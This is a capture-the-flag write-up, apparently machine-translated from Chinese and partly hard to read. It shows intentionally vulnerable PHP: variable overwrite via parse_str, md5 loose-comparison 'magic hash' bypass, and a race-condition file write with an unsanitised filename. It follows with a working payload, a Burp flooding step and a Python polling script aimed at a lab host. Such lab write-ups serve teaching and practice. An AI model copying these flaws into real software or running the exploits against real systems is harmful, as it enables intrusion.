Exercise Record
Reproduce the code:
index.php
<?php
$a = "hongri";
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
echo '<a href="flag.php">flag is here</a>';
}
?>
flag.php
// flag.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
$savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
if (!is_dir($savepath)) {
$oldmask = umask(0);
mkdir($savepath, 0777);
umask($oldmask);
}
if ((@$_GET['filename']) && (@$_GET['content'])) {
//$fp = fopen("$savepath".$_GET['filename'], 'w');
$content = 'HRCTF{y0u_n4ed_f4st} by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);
}
print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
echo 'you can not see this page';
}
?>
Vulnerability Analysis:
Enter the site:
http://10.211.55.5/PHPcode/day7/index.php
Found page properly, you can operate the.
In index.php 第4行presence @parse_str($id); this function does not check the variable $idexists, otherwise if the incoming data to a variable $id, and the current $iddata exists, it will be directly overwritten. In 第6行this way the code for some.
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
PHP HashCompare flawed, put it to each 0Ehash value is interpreted as the beginning 0, so if two different passwords hashed later, their hash values are in 0Ethe beginning, then PHP will think the same as they are 0. And here's the md5(‘QNKCDZO’)result is 0e830400451993494058024219903391. So payloadit is ?id=a[0]=s878926199a. This can be echoed on the page.
http://10.211.55.5/PHPcode/day7/?id=a[0]=s878926199a
Click to enter flag.php
and investigate this question the real point here. In flag.phpthe 第三行and 第四行such two codes are as follows:
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
Here is a referjudgment as to referwhether there is, if there is to show the upload page, and if not, return you can not see this page.
To our knowledge, through alabeling clicking the links will automatically carry on their own referfield. Then 携带referand 不携带referreturned result is not the same.
携带referCase:
不携带refera case:
then the flag.php 第13行and 第18行have this code is as follows:
$content = 'HRCTF{y0u_n4ed_f4st} by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);
There is a key usleep(100000); this problem needs to be written too slowbefore the file is written before the visit, you can get flag, there is competition time here. But here we see the fact file folder path is fixed hardcoded.
Direct access to the returns too slow.
So here is the solution, open Burp的200线程, a continuously contracting
http://10.211.55.5/PHPcode/day7/flag.php?filename=flag&content=111
In the start attackprior need a script constantly request the following link
http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag
Script code:
import requests as r
r1=r.Session()
while (1):
r2=r1.get("http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag")
print (r2.text)
pass
In blasting the same time to access the page, it can appear flag
